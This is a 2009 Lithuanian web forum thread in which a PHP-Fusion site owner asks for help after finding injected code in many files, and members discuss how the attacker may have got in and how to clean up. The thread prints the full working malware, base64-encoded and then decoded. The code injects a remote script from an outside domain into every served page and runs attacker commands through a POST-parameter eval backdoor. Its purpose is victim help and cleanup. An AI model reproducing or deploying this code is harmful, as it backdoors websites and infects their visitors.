Pradinis
Pagalba
Užsisakyk!
- Reklamą
- Hostingą
- El. pašto dėžutę
Užsisakyk!
Įrankiai
Pasidalink
- Visos temos
Forumas | PHP-Fusion, WordPress, Shopify, PHP ir MySQL (PROGRAMAVIMAS) | Expert PHP, MySQL klausimai |
Autorius: Langas | Peržiūrų: 5887 |
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 | |
Sveiki, užtikau kad šendien jau nebeveikia mano tinklalapis ir daugelyje failų randu šį kodą :<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZTc1ajAnKSl7ZnVuY3Rpb24gZTc1ajAoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMk5oYkdsaWNtRjBhVzl1TFhSbGMzUnBibWN0WlhGMWFYQnRaVzUwTG1OdkxuVnJMMDVsZDBsdFp5OXliMkp2ZEhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBlNzVqMDIoJGEsJGIsJGMsJGQpe2dsb2JhbCRlNzVqMDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGU3NWowMSkpY2FsbF91c2VyX2Z1bmMoJGU3NWowMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZTc1ajAnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdlNzVqMCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRlNzVqMGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2U3NWowMicpKSE9J2U3NWowMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?> Gal galite padėti? kaip sutvarkyti tinklalapį ir apsaugoti nuo to, kas tai ? Redagavo Langas 2009 Gru. 3 17:12:49 |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
Sveikas, čia yra shell'as virusas. Oj turėsi darbelio panaikinti sakant bus sunku. Apsaugosi tik su kodu kaip kiti sako antivirusinė. Be to naikink tuos virusus ir CHMOD index.php į 455. http://mightmedia.lt Lietuvių sukurtas TVS. Redagavo d0mce 2009 Gru. 3 16:12:43 |
|
maxas66 Narys Buldozeris Pranešimai: 287 Įstojęs: 2009 Rugs. 8 21:09:44 | |
va kasif(!function_exists('e75j0')){function e75j0($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2NhbGlicmF0aW9uLXRlc3RpbmctZXF1aXBtZW50LmNvLnVrL05ld0ltZy9yb2JvdHMucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function e75j02($a,$b,$c,$d){global$e75j01;$s=array();if(function_exists($e75j01))call_user_func($e75j01,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='e75j0')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('e75j0');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$e75j0l=(($a=@set_error_handler('e75j02'))!='e75j02')?$a:0;eval(base64_decode($_POST['e'])); ir dar viduje vienas kodas užkoduotas <script src=http://calibration-testing-equipment.co.uk/NewImg/robots.php ></script> Čia shellas įkištas kiek supratau, buvo kažkur forume jau tokia tema. Redagavo maxas66 2009 Gru. 3 16:12:44 |
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 | |
Atsinaujink jeigu naudoji PHP-FUSION 6 juk didelė saugumo klaidą ištaisyta!!!!! |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
Nevo teisingas, taip tai buvo tema. MediaL šitas atvejis buvo, nu ką pasakysiu MediaL nebeturėjo jegu su juo kovoti manau tau irgi neatsiras. Visu pirma, galėjo įmesti shell'ą į tavo svetaine taip: Davei kažkam administracijos laipsnį, ir jis įdėjo shell'a arba jo slaptažodį žinojo. Gali būti variantas ir tavo atkodavo md5 koduotę, ir sužinojo tavo slaptažodį įstate į svetaine shellą. Arba dar viena išeitis, leidi prisegti failus. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 | |
d0mce parašė: Nevo teisingas, taip tai buvo tema. MediaL šitas atvejis buvo, nu ką pasakysiu MediaL nebeturėjo jegu su juo kovoti manau tau irgi neatsiras. Visu pirma, galėjo įmesti shell'ą į tavo svetaine taip: Davei kažkam administracijos laipsnį, ir jis įdėjo shell'a arba jo slaptažodį žinojo. Gali būti variantas ir tavo atkodavo md5 koduotę, ir sužinojo tavo slaptažodį įstate į svetaine shellą. Arba dar viena išeitis, leidi prisegti failus. Šitie variantai galimi jeigu turi priejima prie administravimo, kitu atvėju ne. (Na bet galimas daiktas, kad slaptažodžiai buvo: sūrys, šūdas ir pan). |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
Drageli, arba žino jo kas hasha, ir su juo sakau atkodavo md5 koduotę, įlindo į webą ir pradėjo žaisti. Langas visad kai dedi kam administracijos laipsnį neduok pridėtinių puslapių nuorodos uždrausk http://mightmedia.lt Lietuvių sukurtas TVS. |
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 | |
d0mce parašė: Drageli, arba žino jo kas hasha, ir su juo sakau atkodavo md5 koduotę, įlindo į webą ir pradėjo žaisti. Langas visad kai dedi kam administracijos laipsnį neduok pridėtinių puslapių nuorodos uždrausk Na tai sakau slaptažodis buvo labai easy, ir galėjo nebent atkodoti, nes jeigu aš duočiau viena iš savo hash'ų tu atkodinėtum dienas, naktis ir vistiek neatkodotum. |
|
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 | |
Dragelis parašė: Atsinaujink jeigu naudoji PHP-FUSION 6 juk didelė saugumo klaidą ištaisyta!!!!! Atsinaujinau dar tą pačia dieną kai naujiena parašyta buvo, taip ir nesupratau tiksliai ką reikia daryti Bėje nebesvaik, administratorių nebėra, visus pašalinęs esu jau ~ savaitę + yra administracijos apsauga navigation.php ar koks ten faile, automatiškai užbanina. niekas nežino nei duomenų bazės nei ftp. Redagavo Langas 2009 Gru. 3 16:12:44 |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
gal pas tave buvo galima prisegt failus prie kokio forumo? http://mightmedia.lt Lietuvių sukurtas TVS. |
|
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 | |
Taip, tačiau ne php ir kitų panašio tipo |
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 | |
tai šitą galima, apeiti, kad leistu php patalpinti. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 | |
Gi nėra jokių patalpintu failų, jei nepastebėjai, temą sukūriau expert skiltyje, todėl prašyčiau tokiam botui kaip tu kuris rašo nesamones, tai yra atvėjus kurių negalėjo būti, tai nerašyk išvis. Dabar dar vienas klausimėlis, jeigu pakeisiu includes folderį ar svetainė vėl veiks ? jeigu veiks tai kaip išvengti to ateityje, nes pirmą kartą susiduriu su tokiu atvėju Redagavo Langas 2009 Gru. 3 16:12:38 |
|
TDKileris Narys Generolas Pranešimai: 867 Įstojęs: 2008 Lap. 24 18:11:05 | |
Man taspats atvejis buvo,pakovojau savaicike,jau buvo pradinge vienu metu,bet veliau vel pradejo tas pats,sql irgi buvo uzkrestas,tai tiesiog ftp kopija pasidariau i savo kompa jei prireiktu kokiu failiuku. Ir kurk weba is naujo,tik pirma istrink absoliuciai visus senus failus,pakeisk visus paswordus. Tik pirma savo kompe turek kokia antivirusine ,kad netuciau vel nebutu to paties Rekomenduoju gix.lt hostinga Taip pat starhost.lt paslaugas www.surfcss.lt Jau greit |
|
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 | |
O dieve, kaip manai ant v7 eis uždėti v6 vartotojus, siuntinius forumo temas ir postus, komentarus ? |
|
TDKileris Narys Generolas Pranešimai: 867 Įstojęs: 2008 Lap. 24 18:11:05 | |
na net nzn,jau cia reiktu profu klausti nes as buvau v7 taj ir ka reikejo persikeliau i v7 Rekomenduoju gix.lt hostinga Taip pat starhost.lt paslaugas www.surfcss.lt Jau greit |
|
darKy VIP narys Terminatorius Pranešimai: 1284 Įstojęs: 2008 Lap. 10 10:11:05 | |
per pma man rodos galima www.ls-planet.com |
Peršokti į forumą: |